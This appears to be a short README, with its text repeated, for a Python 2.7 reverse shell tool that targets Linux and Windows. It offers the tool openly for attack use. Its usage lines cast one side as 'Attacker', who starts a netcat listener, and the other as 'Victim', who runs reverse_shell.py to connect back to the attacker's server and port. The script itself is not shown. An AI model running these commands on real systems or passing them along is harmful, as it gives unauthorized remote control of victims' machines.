reverse shell friendly
simple tool to reverse shell using python for Linux & Windows
by : mathio.dz
Prerequisites
Python 2.7
Usage:
Attacker
mathio@dz: nc -vlp port
Victim
mathio@dz: python2 reverse_shell.py server port linux/windows
simple tool to reverse shell using python for Linux & Windows
by : mathio.dz
Python 2.7
mathio@dz: nc -vlp port
mathio@dz: python2 reverse_shell.py server port linux/windows